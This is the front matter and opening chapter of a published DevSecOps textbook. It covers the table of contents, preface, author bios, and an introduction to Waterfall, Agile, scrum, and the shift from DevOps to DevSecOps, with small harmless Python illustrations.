Implementing DevSecOps Practices: Supercharge your software security with DevSecOps excellence
ISBN 9781803231495

Get to grips with application security, secure coding, and DevSecOps practices to implement in your development pipeline

English | 258 pages | 2023

Table of contents:
Cover
Title Page
Copyright and Credits
Dedication
Contributors
Table of Contents
Preface
Part 1: DevSecOps – What and How?
Chapter 1: Introducing DevSecOps
Product development processes
The Waterfall model
The Agile methodology
Understanding the shift from DevOps to DevSecOps
The new processes within DevSecOps
DevSecOps maturity levels
Maturity level 1
Maturity level 2
Maturity level 3
Maturity level 4
KPIs
DevSecOps – the people aspect
Summary
Think and act
Part 2: DevSecOps Principles and Processes
Chapter 2: DevSecOps Principles
DevSecOps principles
Unifying the CI/CD pipeline
Fail fast
Automation and innovation in DevSecOps
Introducing compliance checks
Empowering teams to make decisions
Cross-skilling and educating teams and the cultural aspect approach
Proper documentation
Relevant checkpoints
Building and managing secure Dev environments and toolchains
Challenges within the DevSecOps pipeline that principles can resolve
Continuous application changes
The developer knowledge gap
Lack of AppSec tool integration
Summary
Chapter 3: Understanding the Security Posture
Understanding your security posture
Regular meetings
Managing pipelines
Testing pipelines
Tools involved in pipelines
Why and what measures we take to secure the environment
Building the vulnerabilities inventory
Addressing vulnerabilities
Parameters to define the security posture
Discovering the third-party component
Measuring the effectiveness of the technologies used
Managing workflows
What measures can we take to monitor an environment?
A positive way toward the cloud-native world
Cloud-native architectures
Provisioning and configuring infrastructure
Automating controls
Securing the toolchains
Where does security stand in the whole development process?
Compliance and audit
Multi-cloud security
Monitoring
Incident response
Developer tools
Vulnerability management
Summary
Chapter 4: Understanding Observability
Why do we need observability?
The key functions of observability
Linking observability with monitoring
Exploring the monitoring process
Implementing observability with monitoring
Challenges around observability
Making organizations observable
Summary
Chapter 5: Understanding Chaos Engineering
Introducing chaos engineering
Why do we need chaos engineering?
Best practices while working with chaos engineering
Techniques involved in chaos engineering
Specific systems and services that organizations use for chaos engineering
Measuring the effectiveness of performing chaos engineering
Tools involved in chaos engineering
Basic principles of chaos engineering
Team communication strategies while performing chaos engineering experiments
Developing robust chaos engineering practice from failures
Challenges around chaos engineering
How chaos engineering is different from other testing measures
Summary
Part 3: Technology
Chapter 6: Continuous Integration and Continuous Deployment
What is a CI/CD pipeline?
CI
CD – continuous delivery and continuous deployment
The benefits of CI/CD
Automating the CI/CD pipeline
Source control
Automated builds
Continuous testing
Artifact storing
Deployment automation
Environment consistency
Monitoring and feedback
Rollbacks
The importance of a CI/CD pipeline
Summary
Chapter 7: Threat Modeling
What is threat modeling?
The importance of threat modeling in the software development lifecycle
Why should we perform threat modeling?
Threat modeling techniques
Integrating threat modeling into DevSecOps
Pre-development phase
Design phase
Development phase
Testing phase
Deployment phase
Open source threat modeling tools
How threat modeling tools help organizations
Reasons some organizations don’t use threat modeling
Summary
Chapter 8: Software Composition Analysis (SCA)
What is SCA?
How does SCA work?
SCA tools and their functionalities
The importance of SCA
The benefits of SCA
SAST versus SCA
The SCA process
SCA metrics
Integrating SCA with other security tools
Resolving the issues without breaking the build
Detection of security flaws
Open source SCA tools
Discussing past breaches
Summary
Chapter 9: Static Application Security Testing
Introduction
What is SAST?
SAST tools and their functionalities
Identifying vulnerabilities early in the development process
The SAST process
SAST metrics
Integrating SAST with other security tools
Resolving issues without breaking the build
The benefits of SAST
The limitations of SAST
Open source SAST tools
Case study 1
Case study 2
Loss due to not following the SAST process
Summary
Chapter 10: Infrastructure-as-Code (IaC) Scanning
What is IaC?
The importance of IaC scanning
IaC toolset functionalities
Advantages and disadvantages of IaC
Identifying vulnerabilities using IaC
What is the IaC process?
IaC metrics
IaC versus SAST
IaC security best practices
IaC in DevSecOps
Understanding DevSecOps
The role of IaC in DevSecOps
The DevSecOps process with IaC
Key benefits
Challenges and mitigation
Conclusion and future outlook
Open source IaC tools
Case study 1 – the Codecov security incident
Case study 2 – Capital One data breach
Case study 3 – Netflix environment improvement
Summary
Chapter 11: Dynamic Application Security Testing (DAST)
What is DAST?
Advantages and limitations of DAST
The DAST process
DAST usage for developers
DAST usage for security testers
The importance of DAST in secure development environments
Incorporating DAST into the application development life cycle
Advanced DAST techniques
Choosing the right DAST tool
How to perform a DAST scan in an organization
Integrating DAST with other security tools
Incorporating DAST into DevOps processes
Prioritizing and remediating vulnerabilities
Comparing DAST with other security testing approaches
SAST
IAST
RASP
The future of DAST
Summary
Part 4: Tools
Chapter 12: Setting Up a DevSecOps Program with Open Source Tools
Techniques used in setting up the program
Understanding DevSecOps
Setting up the CI/CD pipeline
The technicalities of setting up a CI/CD pipeline
Implementing security controls
Identifying open source security tools
Implementing security policies and procedures
Managing DevSecOps in production
Monitoring and managing the DevSecOps pipeline in production
Using open source tools for monitoring, logging, and alerting
Incorporating continuous compliance and auditing into the pipeline
Managing incidents and responding to security breaches
The benefits of the program
Summary
Part 5: Governance and an Effective Security Champions Program
Chapter 13: License Compliance, Code Coverage, and Baseline Policies
DevSecOps and its relevance to license compliance
The distinction between traditional licenses and security implications
Source code access
Modification and redistribution
Community oversight
Vendor dependency
Cost and resource allocation
Different types of software licenses
Permissive licenses (MIT, Apache)
Copyleft licenses (GPL, LGPL)
Proprietary licenses
The impact of software licenses on the DevSecOps pipeline
How to perform license reviews
Tools and techniques
Engaging legal and security teams
Documentation and continuous improvement
Fine-tuning policies associated with licenses
Establishing an organizational standard
Exception handling
Continuous review and improvement
Case studies
Case study 1 – the Redis licensing change
Case study 2 – Elastic versus AWS licensing drama
Summary
Chapter 14: Setting Up a Security Champions Program
The Security Champions program
Structuring your Security Champions program
Things to remember before setting up the program
Who should be a Security Champion?
How a Security Champions program would look
The top benefits of starting a Security Champions program
What does a Security Champion do?
Security Champions program – why do you need it?
Shared responsibility models
The roles of different teams
Buy-in from the executive
The importance of executive buy-in
How to secure executive buy-in
Measuring the effect of the Security Champions program
Technical aspects to check the effectiveness of the Security Champions program
Strategic aspects to check the effectiveness of the Security Champions program
Summary
Part 6: Case Studies and Conclusion
Chapter 15: Case Studies
Case study 1 – FinTech Corporation
Challenges faced before implementing DevSecOps
Steps taken to transition to DevSecOps
Results and impact on the company’s software development
Lessons learned
Case study 2 – Verma Enterprises
Challenges faced by the organization in terms of security
Implementation of DevSecOps practices and tools
Results and benefits achieved
Case study 3 – HealthPlus
The importance of security in healthcare data and systems
The implementation of DevSecOps practices and tools to improve security
Results and benefits achieved
Case study 4 – GovAgency
Security requirements for government agencies
The implementation of DevSecOps practices and tools to meet compliance and improve security
Results and benefits achieved
Case study 5 – TechSoft
Security requirements for the IT sector
The implementation of DevSecOps practices and tools to meet compliance and improve security
Results and benefits achieved
Common lessons learned and best practices
Lessons learned from implementing DevSecOps practices and tools
Best practices for implementing DevSecOps in software development
Summary
Chapter 16: Conclusion
DevSecOps – what and how?
DevSecOps principles and processes
DevSecOps tools
DevSecOps techniques
Governance and an effective Security Champions program
Topics covered in this book
What’s next?
Case studies and conclusion
Index
Other Books You May Enjoy

Implementing DevSecOps Practices

Supercharge your software security with DevSecOps excellence

Vandana Verma Sehgal

BIRMINGHAM—MUMBAI

Implementing DevSecOps Practices

Copyright © 2023 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Group Product Manager: Pavan Ramchandani
Publishing Product Manager: Neha Sharma
Book Project Manager: Ashwin Kharwa
Senior Editor: Divya Vijayan
Technical Editor: Irfa Ansari
Copy Editor: Safis Editing
Proofreader: Safis Editing
Indexer: Hemangini Bari
Production Designer: Gokul Raj S.T
DevRel Marketing Coordinator: Marylou De Mello

First published: December 2023
Production reference: 1231123

Published by Packt Publishing Ltd.
Grosvenor House
11 St Paul’s Square
Birmingham
B3 1RB, UK

ISBN 978-1-80323-149-5

www.packtpub.com

This book is dedicated to my mentors, who pushed me to write about my DevSecOps experiences, and the Packt team, who positively pushed me at every step. Vandana

Contributors

About the author

Vandana Verma Sehgal is a seasoned security professional with a current focus on DevSecOps at Snyk. In her previous experience, she has dealt with application security, vulnerability management, SOC, infrastructure security, and cloud security. She is a seasoned speaker/trainer and has presented at various public events, ranging from OWASP Global AppSec and Black Hat events to regional events, such as BSides events in India. She is part of the OWASP Global Board of Directors. She also works in various communities on the diversity initiatives Infosecgirls, WoSEC, and null.

Vandana is a member of the Black Hat Asia Review Board as well as multiple other conferences, including Grace Hopper in India and OWASP AppSec in the USA. She is also one of the organizers of BSides Delhi. She has been the recipient of multiple prestigious awards, such as the Cyber Security Woman of the Year Award 2020 at the Cyber Security Awards, Application Security Influencer 2020 by Whitesource, Global Cybersecurity Influencer in IFSEC Global’s “Top Influencers in Security and Fire” category, and the Cybersecurity Woman of the Year Award by the Women’s Society of Cyberjutsu in the “Secure Coder” category. She has also been listed as one of the top women leaders in the field of technology and cybersecurity in India by InstaSafe.

About the reviewers

Shaineel (Shain) Singh has over 25 years’ experience in the computing and telecommunication industries. He is the principal security architect for F5, working with businesses in various sectors throughout the Asia-Pacific region. Having held engineering and architecture roles in the systems, network, and security fields, Shain uses his cross-disciplinary skills to provide a lens into global security and industry trends. Shain likes to spend his time participating in humanitarian and technology-based community groups. He currently co-leads the OWASP Machine Learning Security Top 10 project and contributes to the DevSecOps and Zero Trust Cloud Security Alliance working groups, on their training and certification programs.

The fields of technology and security in particular change rapidly. In order to keep up with the pace, I am deeply indebted to practitioners who take the time to educate, share, and contribute to open source communities, including OWASP, Cloud Security Alliance, and the Linux Foundation. Communities thrive because of the open and healthy collaborative nature in which they operate, and for this, I also thank the community outreach and project leaders.

Rewanth Tammana is a security ninja, open source contributor, AWS Community Builder, and an independent consultant. Previously, he was a senior security architect at the National Bank of Dubai. He is passionate about DevSecOps, the cloud, and container security, has contributed around 17,000+ lines of code to Nmap, and holds industry certifications such as CKS and CKA. Rewanth presents at security conferences worldwide, including Black Hat, DEF CON, Hack in the Box, CRESTCon, and Positive Hack Days. He was recognized as a Bugcrowd MVP Researcher (2018), having identified vulnerabilities in various organizations. He published an IEEE research paper on an offensive attack in machine learning and security and was part of the renowned Google Summer of Code. You can get in touch with him at rewanthtammana.com.

Preface

The integration of Development, Security, and Operations – commonly known as DevSecOps – has emerged as a pivotal approach to software delivery. This methodology not only emphasizes the importance of automating software delivery processes but also places paramount importance on integrating security practices, right from the initial stages of development.

The essence of DevSecOps lies in its ability to break down traditional silos, fostering a culture of shared responsibility for both software quality and security. It recognizes that in the age of cyber threats and frequent software releases, security cannot be an afterthought; it must be ingrained at every stage of the software life cycle.

This book is a culmination of insights, best practices, and hands-on techniques to implement DevSecOps in real-world environments. It delves deep into the practical aspects, guiding readers through the nuances of setting up robust CI/CD pipelines, integrating security tools, automating security checks, and fostering a culture that values security as much as speed.

Whether you are an IT professional aiming to understand the intricacies of DevSecOps, a security enthusiast keen on integrating security into DevOps practices, or a seasoned practitioner looking for hands-on guidance, this book promises to be a comprehensive resource. Through its pages, we’ll demystify the challenges, celebrate the successes, and, above all, pave the way for a future where software is developed swiftly, securely, and efficiently.

Join me on this enlightening journey as we delve into the world of DevSecOps, exploring its principles, practices, and profound impact on the realm of software delivery.

Who this book is for

This book is crafted for a diverse range of readers who are either stepping into the world of DevSecOps or looking to deepen their understanding of its practical applications. Here’s a closer look at who would benefit the most from this resource:

• Software developers and engineers: For professionals who design and code applications, this book offers insights into integrating security measures right from the inception of a project. Understand how to write secure code and identify potential vulnerabilities even before they become threats.

• IT operations professionals: If you’re involved in deploying, monitoring, or managing applications, this guide will introduce you to the tools and practices that ensure smooth and secure deployments, emphasizing the importance of infrastructure as code and automated security checks.

• Security professionals: Those specializing in cybersecurity will benefit from the book’s emphasis on bridging the gap between security and other IT disciplines. Learn how to work collaboratively with development and operations teams, integrate security tools into CI/CD pipelines, and automate security protocols.

• DevOps practitioners: If you’re already familiar with DevOps but wish to delve deeper into the security aspect, this book is for you. Understand how DevSecOps extends and refines the DevOps approach by embedding security in every stage of the software delivery life cycle.

• Technical architects and consultants: Professionals responsible for designing IT ecosystems will gain insights into structuring systems that are both agile and secure, ensuring that security considerations are not just add-ons but foundational elements.

• IT leaders and managers: For decision-makers aiming to implement a DevSecOps culture in their teams or organizations, this book offers a roadmap. Learn about the benefits, challenges, and strategies to promote a culture where security and agility go hand in hand.

• Students and academics: Those in academia, whether studying software development, IT management, or cybersecurity, will find this book a valuable addition to their curriculum, offering real-world insights and practical methodologies beyond theoretical knowledge.

This book is a valuable resource for anyone keen on understanding the synergy between development, operations, and security, and how to implement practices that ensure faster, more efficient, and, most importantly, secure software delivery.

What this book covers

Chapter 1, Introducing DevSecOps, discusses the basics of DevSecOps and the different maturity levels involved in the current state and future attainable state of DevSecOps practices. It helps organizations understand where they are and where things can be taken next. People are the most important element in any technology and process. You can use the best of technology and processes, but without people, goals can’t be achieved. In this chapter, we will learn about the involvement of different teams and what key performance indicators are.

Chapter 2, DevSecOps Principles, explores the DevSecOps principles, which are the key concepts to pick up a program at any point of the development cycle and take it to the maturity stage.

Chapter 3, Understanding the Security Posture, covers understanding the security posture of the DevSecOps pipeline within an organization. We also cover why and what measures we take to secure the environment, what measures we can take to monitor an environment, and where security stands in the whole development process.

Chapter 4, Understanding Observability, examines what observability is and how it is different from monitoring. We also look at how observability helps DevSecOps.

Chapter 5, Understanding Chaos Engineering, covers the ​​ aspects of chaos engineering and how data is fed to a system, well as understanding how the system fails. Chapter 6, Continuous Integration and Continuous Deployment, discusses what is CI/CD, the benefits of CI/CD, how we can automate the CI/CD pipeline, and the importance of the CI/CD pipeline. Chapter 7, Threat Modeling, dives into threat modeling, which involves examining applications through the eyes of an attacker in order to identify and highlight security flaws that could be exploited. This makes security a part of the organizational culture, laying the groundwork for a DevSecOps workplace. Threat modeling also helps teams better understand and learn each other’s roles, objectives, and pain points, resulting in a more collaborative and understanding organization. The chapter also covers the free and open source tools for threat modeling. Chapter 8, Software Composition Analysis (SCA), explores third-party dependencies, which are one of the biggest concerns when we deal with code. Some 80–90 percent of software code contains thirdparty dependencies or libraries. These dependencies come with their own issues and benefits. In this chapter, we will discuss software composition analysis and its uses. We also cover the free and open source tools for SCA. Chapter 9, Static Application Security Testing (SAST), examines SAST, which happens early in the Software Development Life Cycle (SDLC) because it does not require a working application and can be performed without executing any code. The chapter also covers the free and open source tools for SAST. Chapter 10, Infrastructure-as-Code (IaC) Scanning, discusses Infrastructure-as-Code (IaC) scanning, which looks for known vulnerabilities in your IaC configuration files. IaC improves usability and functionality while also assisting developers with infrastructure deployment. The chapter will share the aspects of IaC scanning and usability testing. 
The chapter also covers the free and open source tools for IaC.

Chapter 11, Dynamic Application Security Testing (DAST), delves into DAST, which is the process of analyzing a web application from the frontend to find vulnerabilities. A DAST scanner looks for results that aren’t part of the expected result set and detects security flaws. The chapter also covers the free and open source tools for DAST.

Chapter 12, Setting Up a DevSecOps Program with Open Source Tools, covers the tools and tips needed to set up an effective DevSecOps program, covering it from all angles.

Chapter 13, Licenses Compliance, Code Coverage, and Baseline Policies, explores license compliance, which ensures we manage licenses and policies and keep them up to date.

Chapter 14, Setting Up a Security Champions Program, talks about who security champions are and how we can set up a security champions program.



Chapter 15, Case Studies, discusses case studies from organizations that have set up DevSecOps programs. What were the initial setbacks that eventually contributed to the DevSecOps program’s success? We look at the lessons learned along the way.

Chapter 16, Conclusion, concludes the book, focusing on what we have learned from the different chapters and offering a call to action on the way forward.

To get the most out of this book

Software/hardware covered in the book    Operating system requirements
Jenkins                                  Windows, macOS, or Linux
OWASP open source tools                  Windows, macOS, or Linux

Conventions used

There are a number of text conventions used throughout this book.

Bold: Indicates a new term, an important word, or words that you see on screen. For instance, words in menus or dialog boxes appear in bold. Here is an example: “Select System info from the Administration panel.”

Tips or important notes
Appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, email us at customercare@packtpub.com and mention the book title in the subject of your message.

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata and fill in the form.

Piracy: If you come across any illegal copies of our works in any form on the internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.


Share Your Thoughts Once you’ve read Implementing DevSecOps Practices, we’d love to hear your thoughts! Please click here to go straight to the Amazon review page for this book and share your feedback. Your review is important to us and the tech community and will help us make sure we’re delivering excellent quality content.


Download a free PDF copy of this book

Thanks for purchasing this book! Do you like to read on the go but are unable to carry your print books everywhere? Is your eBook purchase not compatible with the device of your choice?

Don’t worry, now with every Packt book you get a DRM-free PDF version of that book at no cost. Read anywhere, any place, on any device. Search, copy, and paste code from your favorite technical books directly into your application.

The perks don’t stop there, you can get exclusive access to discounts, newsletters, and great free content in your inbox daily. Follow these simple steps to get the benefits:

1. Scan the QR code or visit the link below:

https://packt.link/free-ebook/978-1-80323-149-5

2. Submit your proof of purchase
3. That’s it! We’ll send your free PDF and other benefits to your email directly

Part 1: DevSecOps – What and How?

This part will introduce you to DevSecOps, provide a bit of background information, and cover how different software development methods have played a role in its formation, from Waterfall to Agile. This part also looks at the various components of DevSecOps. We then focus on familiarizing you with DevSecOps basics and how an organization can set up DevSecOps.

This part has the following chapter:

• Chapter 1, Introducing DevSecOps

1
Introducing DevSecOps

DevSecOps is a term that is getting a lot of attention from everywhere. Before the advent of DevOps and DevSecOps, organizations used to perform product security checks at the end of the software development life cycle (SDLC). Security was viewed as less important than the other phases because the emphasis was primarily on application development. Most of the other stages would have been completed and the products would be nearly finished by the time engineers performed security checks. Therefore, finding a security threat at such a late stage required rewriting countless lines of code, a painfully time-consuming and laborious task. Patching eventually became the preferred solution, as expected. As a result, it was assumed nothing could go wrong.

In this chapter, we will learn about the basics of DevSecOps and the different maturity levels involved in the current state and future attainable state of the practices involved in DevSecOps. We will also cover the following aspects:

• The involvement of different teams
• Key performance indicators (KPIs)

We will also cover the evolution of DevOps and DevSecOps in terms of the Waterfall model, understand the Agile methodology, and learn how DevSecOps is changing the paradigm for organizations.

In this chapter, we are going to cover the following main topics:

• Product development processes:
  - The Waterfall model
  - The Agile methodology
• DevSecOps and its evolution
• The new processes within DevSecOps


• Maturity levels:
  - Maturity level 1
  - Maturity level 2
  - Maturity level 3
  - Maturity level 4
• KPIs
• DevSecOps – the people aspect

Product development processes

Before we cover DevSecOps, let’s understand how products are developed. Here, we will quickly run through the processes that are available currently or have existed in the past. Product development has been around for over six decades. Organizations, defense agencies, and various teams have been following certain methodologies for developing and deploying applications. Let’s understand the evolution of these methodologies, which are as follows:

• Spiral
• The Waterfall model
• Agile software development:
  - Extreme programming (XP)
• Rapid application development (RAD)
• Systems development life cycle

All these methodologies have changed the way we develop applications. In the initial days, everything revolved around the Waterfall model, where every phase took time. Every phase had to be completed before we could move on to the next one. We will cover some of the important methodologies in this chapter as they led to the Agile process and DevSecOps. We will cover two models here – Waterfall and Agile. First, we’ll discuss the Waterfall model.

The Waterfall model

The SDLC is the process of developing applications in different phases. The SDLC has multiple models, and the Waterfall model is one of the most widely used models, still in use by many organizations. The Waterfall model gives organizations a step-by-step process to follow.


The SDLC consists of seven stages:

1. Planning
2. Requirements gathering and analysis
3. Design
4. Development
5. Testing
6. Implementation and integration
7. Production and maintenance

These are the sequential stages that are used in the Waterfall model to develop an application:

1. Planning: This is the stage where organizations start to plan what is needed in an application, the new features that need to be built, and what languages will be used.

2. Requirements gathering and analysis: During this stage, all potential system requirements are gathered and recorded in a requirement specification document. There are tools available to gather these requirements, though they can be captured in a Word document or Excel sheet as well. Which method is used depends on the organization. The best way to capture these requirements is in a system; if any of the requirements change, we can make the necessary changes in the system as well.

3. Design: Consider this stage as the architect’s dream session. We take all those must-haves and would-loves from phase 1 and turn them into an actionable blueprint. This sets the stage, specifying the hardware and painting the big picture of our digital masterpiece. It is like drafting the dream from a wishlist to a blueprint!

4. Development: This isn’t just coding; it’s crafting! We whip up mini-programs – our “magic blocks” – and piece them together like a puzzle. Each block goes through its own “quality check party” to make sure it’s up to snuff. Similar to building blocks, this is where small pieces create big magic!

5. Testing: Think of this stage as dress rehearsal meets detective work. Each of those mini-programs gets its moment in the spotlight before we assemble the full ensemble. Then, we put the whole act through the wringer, making sure it’s standing ovation-ready. Think of it as a test fest, where we iron out the kinks!

6. Implementation and integration: This stage is like the grand premiere, where our star finally takes the stage! This is where our product undergoes the royal testing treatment and is ready to make its big debut. Will it be the next blockbuster on the market or the VIP guest in a client’s world? Either way, it’s showtime!


7. Production and maintenance: This stage has a different aspect – even rock stars need tune-ups. When real-world snags pop up, we roll out patches like a roadie rolls out amps. And because we’re always chasing perfection, get ready for some killer updates:

Figure 1.1: SDLC
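The strictly gated, sequential nature of these stages can be sketched in a few lines of code. This is purely an illustrative model (the stage names come from the list above; the simulated failure is an invented example), but it shows why a security flaw found in a late stage blocks everything downstream:

```python
# Illustrative sketch only: the Waterfall model as a strictly gated
# sequence, where a stage can begin only after every earlier stage has
# finished. A late failure (say, in testing) blocks everything after it,
# which is why late-found security flaws were so expensive to fix.

WATERFALL_STAGES = [
    "planning",
    "requirements gathering and analysis",
    "design",
    "development",
    "testing",
    "implementation and integration",
    "production and maintenance",
]

def run_waterfall(failing_stage=None):
    """Run the stages in order; return (completed_stages, failed_stage)."""
    completed = []
    for stage in WATERFALL_STAGES:
        if stage == failing_stage:
            return completed, stage  # everything downstream is blocked
        completed.append(stage)
    return completed, None

# A problem surfacing in testing leaves the last two stages unreached.
done, failed = run_waterfall(failing_stage="testing")
print(failed)     # testing
print(len(done))  # 4
```

Note how the model offers no way to revisit an earlier stage without starting the sequence again – exactly the pain point that motivated Agile and, later, DevSecOps.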

The Waterfall model changed the way we develop applications and was widely adopted by organizations, which followed the process step by step. There were a few releases every year, and adapting to that process was easy and feasible. However, over the years, things started changing. Organizations wanted to develop applications faster. The cloud became a thing, and everyone wanted to push their applications and features to production with lightning speed. This ushered in the Agile and DevOps era.

The Agile methodology

The term agile software development refers to a fail-fast methodology that adopts new changes early on. Agile methods or processes typically encourage a lightweight management approach that pushes early inspection and adaptation. The Agile methodology is a framework for including all teams so that they can work together to deliver high-quality software quickly. It helps businesses tie development to customer needs and company objectives.

In the early days, release cycles were long, and it took 3 months to a year to develop an application. Once that was done, everyone was relieved and ready to party. The Agile methodology changed the mindset: there are more releases at a quicker pace. Organizations have started to push out multiple releases in a month, in a week, or even in a day. The Agile methodology shortened the application development life cycle to a great extent. Organizations started following scrum processes, which are part of Agile.

Scrum

Scrum is a process framework – a specific set of guidelines that a process must adhere to in order to be consistent with it. The scrum process highlights the importance of standing up every day for a very brief period and discussing sprints.


Sprints

Teams who use the Agile methodology work in short periods known as sprints. Sprints can be of any length, but a typical sprint lasts 2 weeks, regardless of the team. Teams complete specific tasks during these sprints, evaluate their performance, and then work to get better in the following sprint.

There are different types of scrum meetings:

• Daily standup meetings: This is a very short meeting, generally no longer than 15-20 minutes. In this meeting, all the product owners, architects, and project managers meet to check the status of the sprints.
• Sprint planning meetings: In this meeting, everyone comes together to decide the duration of a sprint and the number of sprints needed to complete the task. Sprints are generally no longer than 30 days.
• Sprint review meetings: These meetings are held once sprints end and showcase what has been done around the product.
• Retrospective meetings: These meetings are for checking what has been done right and what has gone wrong.
• Backlog meetings: In this meeting, the product backlog is tracked and checked to see how soon it can be worked on.

All these meetings are headed by a person known as a scrum master. They organize daily stand-up meetings, reviews, demos, and other project-related gatherings, and they make sure all the teams are adhering to the timeline. They track the progress of sprints to make sure products and projects are managed properly and on time. If there are any changes within the sprints, these can be managed and resolved after discussion with the teams.
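As a toy illustration of sprint cadence, the following sketch computes the start and end dates of consecutive fixed-length sprints. The start date and the 2-week length are arbitrary assumptions, not prescribed by Scrum:

```python
from datetime import date, timedelta

def sprint_schedule(start, sprint_days=14, sprints=3):
    """Return (start, end) date pairs for back-to-back fixed-length sprints."""
    schedule = []
    for i in range(sprints):
        sprint_start = start + timedelta(days=i * sprint_days)
        sprint_end = sprint_start + timedelta(days=sprint_days - 1)
        schedule.append((sprint_start, sprint_end))
    return schedule

# Three 2-week sprints starting on an arbitrary Monday.
for s, e in sprint_schedule(date(2023, 1, 2)):
    print(s, "->", e)
```

Each sprint begins the day after the previous one ends, reflecting the back-to-back rhythm described above.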

Teams working together The Agile methodology emphasizes teams working together to make sure we have a viable product to be delivered to clients:


Figure 1.2: Agile methodology

Many sprint management tools are available to ensure the sprint goes smoothly, such as Trello boards:

Figure 1.3: Trello board


We can also use a whiteboard, where we can color-code the tasks and sprints:

Figure 1.4: Whiteboard

Agile software development evolved as a reaction to rigid software development models such as the Waterfall model. Agile methods include XP. Agile embodies many modern development concepts, including more flexibility, fast turnaround with smaller milestones, strong communication within the team, and more customer involvement. Think of XP as the ultimate team sport in the software world, but way more chill. Two coders pair up like buddy cops in a movie, working off a plan that’s crystal clear. But here’s the fun twist: customers aren’t just spectators; they’re part of the squad! Imagine a group text that never ends – that’s how much everyone’s chatting to make sure things go smoothly. We can also say that XP is like having a coding jam session where everyone – coders and customers – gets to riff together in real time.

Understanding the shift from DevOps to DevSecOps

Picture DevOps as a dynamic duo of superhero teams, with developers and operations joining forces to save the business world. Their mission? Pumping out awesome apps and updates to wow the crowd. But then, DevSecOps enters the scene – a supercharged version of our dynamic duo. This time, they’ve got a new sidekick: security (Sec). By weaving Sec into the mix, we’re not just cranking out cool features; we’re making sure they’re as safe as a bank vault.


DevSecOps is an extension of DevOps, introduced to keep security up to the speed of DevOps. In DevOps, operations teams were motivated and measured to stabilize production to meet service-level agreements (SLAs). It was about making new changes, and making them quickly – which made it look like a lot of things were being left behind.

In recent years, many organizations have evolved their DevOps practices to address their business challenges more successfully. DevOps is a contemporary method for meeting the demands of the business by delivering applications more quickly and at higher quality. DevOps now spans the entire enterprise, affecting processes and data flows and bringing about significant organizational changes. This differs from the past, when it was primarily concerned with just putting the IT services for applications in place.

DevOps continues to gain momentum and evolve with every passing day, and new technologies are being included as part of it. The initial idea was to remove the communication gap between different teams during development processes. The communication gap has always been a huge challenge for organizations. Development teams work on developing the features needed by the organization, while the operations team works to make sure the application is working smoothly. At the same time, Sec comes into the picture and becomes a big bottleneck as soon as we talk about embedding security in the different phases of development. It opens up a can of worms that never ends.

We are now observing the adoption of many of the techniques used by developers to support more agile and responsive processes. This aids organizations in determining their current situation and possible future directions. The most crucial component of any process or technology is people. Even with the best processes and technologies, results are impossible to achieve without people.
Since we’re talking about DevSecOps, it starts with DevOps, which involves quickly delivering higher-quality software by combining and automating the work of software development, IT operations teams, project managers, and everyone working around the development pipeline. If an organization is willing to move toward DevSecOps from its traditional model, it needs to have DevOps in place. That’s contradictory to earlier development models.

Rather than relying on human intervention, the process aids in monitoring the security workflow. Additionally, it enhances our ability to identify security flaws in the ecosystem. Employees may feel replaced by automation, which could make them resent giving up their current level of administrator authority. To get around the bottlenecks in the software development and deployment process, mostly on the ops side, the initial plan was to simply de-silo Dev and Ops.

The new processes within DevSecOps

DevSecOps has changed the role of Sec in DevOps. Security has shifted from sitting at the end phase – a big hump on the way to production – to being part of every phase of the development life cycle. It entails integrating security earlier in the application development life cycle and starting to think about infrastructure and application security right away. Additionally, it entails automating a few security checkpoints to prevent a delay in the DevOps workflow. Figuring out the right tools and processes for people can assist them in achieving their goals. Instead of security stopping the whole pipeline, it is part of each of the following phases:

• Plan
• Code
• Build
• Test
• Release
• Continuous deployment and decommissioning
• Operate
• Continuous monitoring
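To make this concrete, here is a minimal sketch of a pipeline in which each phase carries its own security check instead of one gate at the end. The phase names come from the list above; the check functions are placeholders standing in for real tools (threat modeling, SAST, SCA, DAST, monitoring, and so on), not an actual pipeline implementation:

```python
# Sketch: each phase carries its own security check instead of one
# big security gate before production. The checks are placeholders.
PHASES = ["plan", "code", "build", "test", "release", "deploy", "operate", "monitor"]

def run_pipeline(checks):
    """checks maps a phase name to a callable returning True on pass.

    Returns the first failing phase, or None if everything passes.
    """
    for phase in PHASES:
        check = checks.get(phase, lambda: True)  # no check defined: pass through
        if not check():
            return phase  # fail fast: stop at the first insecure phase
    return None

# Example: a (simulated) scanner failure during the build phase.
result = run_pipeline({"build": lambda: False})
print(result)  # build
```

Because every phase has a hook, a failure surfaces at the phase where it was introduced, rather than as a surprise just before release.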

Figure 1.5: DevSecOps in action

We can have the best tools that money can buy, but DevSecOps will not work if your team is not working together. Equally, you can have the most cooperative team, but nothing will work out if you don’t have the right set of tools:

Not all tools are DevSecOps-ready.
Not all tools can fit into a pipeline.


Quiet, secluded processes can not only destroy the DevOps culture but also ultimately reduce the security posture of the whole organization:

We can have the best tools.
We can have the best processes.
We can have the best people.
However, if the culture of the organization is not exercised, nothing will work.

This compartmentalized way of thinking not only undermines the DevOps culture but also weakens the organization’s overall security posture. The secret is to reduce process friction to a minimum. Any organization’s processes are carried out by people. DevSecOps processes, which aim to reduce the enterprise attack surface and enable effective management of technical security debt, are carried out by people using technologies.

DevSecOps challenges the way traditional security teams integrate with the larger business, which is one of its most crucial aspects. If attitudes are to shift, it will take a top-down strategy to change behaviors and increase awareness at all levels of a company.

DevSecOps maturity levels

Understanding maturity starts with understanding where you stand in DevSecOps. The DevSecOps maturity model illustrates how security measures can be prioritized in conjunction with DevOps tactics, and how security can be strengthened by utilizing DevOps techniques. The future-focused DevSecOps maturity model directs the application of the necessary guidelines and security measures to thwart attacks.

